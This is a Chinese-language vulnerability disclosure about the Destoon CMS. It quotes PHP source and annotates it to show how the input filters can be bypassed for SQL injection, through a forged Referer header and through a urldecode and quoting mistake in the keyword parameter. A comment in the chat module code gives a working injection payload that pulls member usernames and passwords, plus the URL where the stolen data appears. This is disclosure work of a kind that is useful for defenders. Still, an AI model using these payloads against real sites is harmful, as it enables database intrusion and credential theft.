要过年了,加班加点的。个人觉得不应该仅仅只检测用户的输入,而应该在SQL查询前进行检测才能更好的起到防注入的效果吧,因为人总是有遗漏的。
common.inc.php 0x00
if(!empty($_SERVER['REQUEST_URI'])) strip_uri($_SERVER['REQUEST_URI']);//跟进0x01
if($_POST) { $_POST = strip_sql($_POST); strip_key($_POST); }
if($_GET) { $_GET = strip_sql($_GET); strip_key($_GET); }
...
if($_POST) extract($_POST, EXTR_SKIP);
if($_GET) extract($_GET, EXTR_SKIP);
...
$DT_REF = get_env('referer'); //跟进0x01
...
$forward = isset($forward) ? urldecode($forward) : $DT_REF;//注入1跟进0x02,没有设置forward的话就用referer替代,而referer是由我们控制的而且不受GPC影响,也不受过滤的影响。
...
$kw = isset($_GET['kw']) ? htmlspecialchars(str_replace(array("\'"), array(''), trim(urldecode($_GET['kw'])))) : '';
//注入2跟进0x03,这里程序员实际意思是想把'替换成空,应该这么写array('\''),但是他用的双引号,意思就是将\'替换成空,这里可以我们通过urldecode成功绕过通用防注入跟引入单引号。程序检查了REQUEST_URI里不能含有',所以这个只有在IIS的平台下,并且是要以cgi/fastcgi运行才不会获取到数据从而绕过。
//http://support.microsoft.com/kb/954946/zh-cn
//http://http://www.myhack58.com/Article/html/2/5/Article_005_1.htm
//http://support.microsoft.com/kb/2277918/zh-cn
$keyword = $kw ? str_replace(array(' ', '*'), array('%', '%'), $kw) : '';//空格替换成%,用%09绕过就行了。
...
include/global.func.php 0x01
function strip_uri($uri) {
if(strpos($uri, '%') !== false) {
while($uri != urldecode($uri)) {
$uri = urldecode($uri);
}
}
if(strpos($uri, '<') !== false || strpos($uri, "'") !== false || strpos($uri, '"') !== false || strpos($uri, '0x') !== false) { //不能出现'
dhttp(403, 0);
dalert('HTTP 403 Forbidden', DT_PATH);
}
}
function strip_sql($string) {//由于可伪造referer,还有可以通过urldecode解码绕过,无视下面。
$search = array("/union/i","/0x([a-z0-9]{2,})/i","/select([[:space:]\*\/\-])/i","/update([[:space:]\*\/])/i","/replace([[:space:]\*\/])/i","/delete([[:space:]\*\/])/i","/drop([[:space:]\*\/])/i","/outfile([[:space:]\*\/])/i","/dumpfile([[:space:]\*\/])/i","/load_file\(/i","/substring\(/i","/substr\(/i","/concat\(/i","/concat_ws\(/i","/ascii\(/i","/hex\(/i","/ord\(/i","/char\(/i");
$replace = array('union','0x\\1','select\\1','update\\1','replace\\1','delete\\1','drop\\1','outfile\\1','dumpfile\\1','load_file(','substring(','substr(','concat(','concat_ws(','ascii(','hex(','ord(','char(');
return is_array($string) ? array_map('strip_sql', $string) : preg_replace($search, $replace, $string);
}
function get_env($type) {
switch($type) {
case 'ip':
...
case 'referer':
return isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';//可伪造。
...
module/member/chat.inc.php 0x02
if($chat) {
//对话已经存在
if($chat['touser'] == $_username) {//当前为接收人
if($DT_TIME - $chat['freadtime'] > $MOD['chat_poll']*3) {//发起对话人已经断开
$db->query("UPDATE {$table} SET fromuser='$chat_fromuser',touser='$chat_touser',tgettime=0 WHERE chatid='$chatid'");
} else {//发起人在线
dheader('?chatid='.$chatid);
}
//
} else {//当前为发起人
if($DT_TIME - $chat['treadtime'] > $MOD['chat_poll']*3) {//接收人已经断开
$db->query("UPDATE {$table} SET tgettime=0 WHERE chatid='$chatid'");
} else {//接收人在线
//
}
}
} else {
$forward = dsafe($forward);
if(strpos($forward, $MOD['linkurl']) !== false) $forward = '';
//创建一个新对话
$db->query("INSERT INTO {$table} (chatid,fromuser,touser,tgettime,forward) VALUES ('$chat_id','$chat_fromuser','$chat_touser','0','$forward')"); //伪造referer注射。
/*
wooyun'),(12345679801234567890123456789012,(select concat(username,0x2C,password) from destoon_member limit 0,1),'test2test',4,'5
访问
http://localhost/de/member/chat.php?chatid=12345678901234567890123456789012
就能看到注入返回的数据了。
*/
}
} else if(isset($chatid) && is_md5($chatid)) {
$chat = $db->get_one("SELECT * FROM {$table} WHERE chatid='$chatid'");
if($chat && $chat['touser'] == $_username) {
$chat_id = $chatid;
$chat_status = 3;
if(check_name($chat['fromuser'])) {
if($DT_TIME - $chat['freadtime'] > $MOD['chat_poll']*3) {//发起对话人已经断开
$db->query("UPDATE {$table} SET tgettime=0 WHERE chatid='$chatid'");
dheader('chat.php?touser='.$chat['fromuser']);
}
$user = userinfo($chat['fromuser']);
$online = online($user['userid']);
$user['type'] = 'member';
} else {
$user = array();
$user['type'] = 'guest';
$user['ip'] = $chat['fromuser'];
$user['area'] = ip2area($chat['fromuser']);
if($DT_TIME - $chat['freadtime'] > $MOD['chat_poll']*3) {//发起人是游客,并且已经断开,只能查看记录
$time = $DT_TIME - $MOD['chat_poll']*4;
$db->query("UPDATE {$table} SET freadtime='$time' WHERE chatid='$chatid'");
}
}
$head_title = '与'.($user['type'] == 'guest' ? '【游客】' : $chat['fromuser']).'对话中';
} else {
dheader('chat.php');
}
$type = 2;
}